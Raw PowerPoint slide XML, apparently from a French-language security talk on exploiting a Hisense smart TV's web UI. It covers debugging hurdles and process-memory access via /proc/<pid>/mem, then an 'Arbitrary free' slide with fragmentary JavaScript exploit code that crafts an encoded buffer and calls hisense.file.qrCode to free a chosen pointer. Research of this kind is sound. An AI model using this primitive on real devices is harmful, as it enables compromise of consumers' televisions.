                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56F0B310-427B-5959-E26B-FFBB58A0185A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="317171" y="1194579"/>
            <a:ext cx="4387858" cy="4039567"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>HisenseUI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> attrape les signaux SIGCONT ce qui empêche d’utiliser gdb correctement </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Les crashs de l’application semble être attrapé par l’application qui déclenche un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRP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r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le système réalise un </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Coredump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> des processus qui crash </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent6"/>
              </a:solidFill>
            </a:endParaRP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r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Coredump</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> contient l’état des registres au moment du </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>abort</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> et non au moment du SIGSEGV </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Utilisation d’outils rudimentaire pour lire/écrire dans la mémoire du processus via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>/proc/&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0" err="1"/>
              <a:t>pid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0"/>
              <a:t>&gt;/mem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Possibilité de patcher le code du processus au runtime pour debugger</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Image 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BB21276F-5DFD-FE16-AF49-FB8C0FFCB6C6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="14969"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4705029" y="1424776"/>
            <a:ext cx="4265546" cy="2815894"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AC61C2D6-D4C3-6FD7-7B6D-B8A4741B49CD}"/>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13" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{771F862F-4D8C-E810-A5B8-EDB47CE2FF39}"/>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a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1000" dirty="0"/>
              <a:t>Introduction</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1361807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AADC30D-879D-C1D7-A1DE-156E07A912C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C77ECC4-3067-781A-D60A-E05EF9B7C030}"/>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0FDFD71F-0C1F-15F3-1BFA-30535631C632}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="ZoneTexte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{894F9C20-C66D-9902-15BC-4C5C8FEB0FF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="1085017"/>
            <a:ext cx="6570350" cy="3754874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> free</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address</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br>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>var</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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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4096</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </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FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>3</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"png"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   // fscale,option_1,option_2,option_3,show_hrt,input_mode</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1"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"XXXX"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6</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endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>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128</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text</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>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"%80%80"</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rows</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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"%80%80"</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width</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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128</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primary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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100</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errtxt</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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31684</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encoded_data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"XXXX"</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repeat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>178</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a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>row_height</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="008000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008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address</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>unescape</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// free pointer 0x80c20108</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>hisense.file.qrCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Yolo"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"%08%01%80"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>));</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E8BFF934-8EDC-1459-293B-7FAA2544CCE3}"/>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12" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FADF6C4-4225-0C31-C341-280BD4010A2E}"/>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Rappels</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Image 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2024D98E-5553-55D5-DF78-FB766AA55614}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187276" y="565888"/>
            <a:ext cx="3591598" cy="4283313"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B84EC83-B499-879A-A6BF-D1AF9449B05D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5187276" y="1315426"/>
            <a:ext cx="3591598" cy="21897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dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDED213E-EC3D-843D-9AAD-C989A8D02BF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="691476" y="2192379"/>
            <a:ext cx="3766224" cy="441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 name="Flèche : droite 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C313915B-A966-6EDB-5CA3-3E07486522D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="2192379"/>
            <a:ext cx="541020" cy="379371"/>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5C6C874-A6AA-8368-783C-D8FE5B35C4AE}"/>
